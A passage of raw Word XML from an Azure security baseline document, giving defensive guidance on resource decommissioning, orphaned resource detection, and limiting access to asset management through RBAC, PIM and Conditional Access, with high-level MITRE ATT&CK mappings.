        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Data backup and retention: Verify backup completion and retention policy compliance before resource deletion ensuring business continuity and regulatory compliance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CEF8A3" w14:textId="026BC617" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve">Access revocation: Remove all role assignments, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>managed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve"> identities, service principals, and Key Vault access policies associated with resources before deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066625C9" w14:textId="66A6491B" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Network dependency validation: Verify no active network dependencies, peering relationships, or DNS records preventing safe resource removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49530A98" w14:textId="1030DCE4" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Compliance and legal hold check: Validate no legal holds, regulatory retention requirements, or active investigations requiring resource preservation before deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7131C5" w14:textId="3FC00BEF" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Soft delete enablement: Leverage soft delete capabilities for key vaults, storage accounts, and databases providing recovery window for accidental deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4117237F" w14:textId="0777E41A" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Orphaned resource detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2EF15" w14:textId="60922EE3" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Azure Advisor cost recommendations: Leverage Azure Advisor identifying unused resources including unattached disks, idle virtual machines, and unused public IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014520B6" w14:textId="32FF6FF6" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Azure Resource Graph queries: Custom queries discovering orphaned resources based on activity patterns, last access times, and resource utilization metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F001737" w14:textId="25E1A43A" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Automated decommissioning workflows: Azure Automation runbooks identifying and decommissioning orphaned development resources after configurable idle periods with owner notification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E4F4D2" w14:textId="0EF56400" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc242449519"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>AM-4: Limit access to asset management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="595A27A2" w14:textId="2B44E192" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D104D26" w14:textId="4036ABCC" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve">Enforce least-privilege access to asset management capabilities through role-based access controls, conditional access policies, and resource protection </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA74C0">
        <w:lastRenderedPageBreak/>
        <w:t>mechanisms. Limit users' ability to create, modify, or delete assets based on business justification, requiring strong authentication, secure workstations, and time-limited elevated access for administrative operations affecting production infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E74839" w14:textId="15A45A30" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F7C43A7" w14:textId="385543F3" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Accidental production impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E83D0E" w14:textId="29F156B0" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Overprivileged users accidentally delete production resources, modify critical network configurations, or disable security monitoring causing business disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA99B37" w14:textId="23037DD5" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Insider threat amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D3E093" w14:textId="63A779AC" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Malicious insiders with excessive asset management permissions can delete audit logs, exfiltrate data, deploy malicious infrastructure, or sabotage systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623DAE93" w14:textId="3A9D2E7F" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Privilege escalation pathways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E84ADE" w14:textId="2F8EDD2E" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve">Attackers compromising accounts with asset management </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve"> escalate privileges by modifying RBAC assignments, creating service principals, or deploying resources with elevated access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340D91D" w14:textId="55985DBA" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Compliance and audit failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A963193" w14:textId="3EB082F1" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve">Lack of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>least</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>-privilege access controls violates regulatory requirements for separation of duties and creates audit findings in SOX, PCI-DSS, and HIPAA assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4608C78B" w14:textId="7765B056" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Credential theft impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60A0C8" w14:textId="11C9F00F" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Compromised credentials with broad asset management access enable attackers to cause maximum damage across cloud environment before detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838CDE3" w14:textId="23E42B3A" w:rsidR="00FA74C0" w:rsidRDefault="000E0219" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Change control bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BDB8D" w14:textId="5D3511E3" w:rsidR="000E0219" w:rsidRPr="00FA74C0" w:rsidRDefault="000E0219" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Excessive permissions allow users to bypass change control processes, approval workflows, and security review procedures for infrastructure modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0178E381" w14:textId="218F6ECE" w:rsidR="00FA74C0" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE4D9C" w14:textId="24E37D9D" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F6F54B" w14:textId="483EBE82" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>valid accounts (T1078) using compromised accounts with asset management permissions to escalate privileges by modifying role assignments or creating high-privilege identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082CE357" w14:textId="33CFC54F" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3908F9FC" w14:textId="470A6F26" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:lastRenderedPageBreak/>
        <w:t>resource hijacking (T1496) leveraging asset management permissions to deploy cryptocurrency mining infrastructure or other resource-intensive malicious workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276DC39B" w14:textId="5ABD2CCC" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666DECA3" w14:textId="7EA93E48" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>impair defenses (T1562) using infrastructure permissions to disable security monitoring, delete diagnostic logs, or remove security agents preventing detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A4DDD" w14:textId="68D316D6" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="000E0219">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-4.1: Implement role-based access control for asset management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35845CF7" w14:textId="43BABF90" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Implement least-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E0219">
        <w:t>privilege</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E0219">
        <w:t xml:space="preserve"> asset management through these access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E555052" w14:textId="1E759447" w:rsidR="000E0219" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Least-Privilege Role Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1177F08E" w14:textId="2FA53154" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Reader role as default: Grant Reader role to general users providing visibility into resources without modification capabilities supporting operational awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2385C403" w14:textId="603ACC28" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Resource-specific Contributor roles: Use service-specific Contributor roles (Virtual Machine Contributor, Storage Account Contributor) instead of broad Contributor role limiting scope of permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F8CE1" w14:textId="57729F34" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Custom role definitions: Create custom RBAC roles with minimal required permissions for specific job functions avoiding over-permissioned built-in roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1FC23" w14:textId="090B2683" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Resource group and resource scoping: Scope role assignments to specific resource groups or individual resources instead of subscription-wide assignments reducing blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE9A3F" w14:textId="798D5470" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Time-limited assignments: Implement temporary role assignments with expiration dates for project-based access requiring periodic revalidation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6874611E" w14:textId="776746DA" w:rsidR="000E0219" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Privileged access management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A5C925" w14:textId="223AE69B" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Microsoft Entra Privileged Identity Management (PIM): Require just-in-time activation for Owner and Contributor roles with approval workflows, justification requirements, and maximum duration limits (Microsoft Entra Privileged Identity Management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BBC5B" w14:textId="74E8FF61" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Microsoft Entra ID Governance: Implement Microsoft Entra ID Governance for periodic access reviews of asset management permissions ensuring least-privilege access through automated access certifications and entitlement management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16550EAA" w14:textId="42A585C5" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Emergency access accounts: Maintain break-glass accounts with Owner permissions secured with offline credentials, monitored access, and regular validation procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072007AE" w14:textId="6BBD98D4" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:lastRenderedPageBreak/>
        <w:t>Separation of duties: Separate permissions for resource provisioning, security configuration, and network management preventing single-person high-risk changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28457431" w14:textId="31781912" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="000E0219">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-4.2: Implement Conditional Access for Azure management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64197CA3" w14:textId="026B4BC6" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Enforce context-aware infrastructure access through these policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B367E5" w14:textId="518F8315" w:rsidR="000E0219" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Conditional Access policy requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5DA54" w14:textId="01F08301" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Multi-factor authentication enforcement: Require MFA for all access to Azure Management App (Azure Resource Manager API) preventing credential-based attacks on infrastructure management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6A84F6" w14:textId="36BD7728" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Compliant device requirement: Restrict Azure management access to Intune-managed compliant devices preventing asset management from unmanaged personal devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F8A73" w14:textId="5195454F" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Privileged Access Workstation (PAW): Require access to Owner and Contributor roles from dedicated privileged access workstations with enhanced security configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17F1DE" w14:textId="1D4AFF21" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Network location restrictions: Limit Azure management access to corporate network locations or approved VPN connections blocking access from untrusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F027C35" w14:textId="71599255" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Risk-based access control: Block or require additional authentication for Azure management access from unfamiliar locations, risky sign-ins, or anonymous IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5164BB85" w14:textId="2D1F5BB7" w:rsidR="000E0219" w:rsidRDefault="000E0219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Conditional Access block scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC3BE45" w14:textId="28B88CC4" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="00D00263">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0219">
        <w:t>Block access policy: Implement "Block Access" policy for Microsoft Azure Management App for users who should never access Azure infrastructure management.</w:t>
      </w:r>
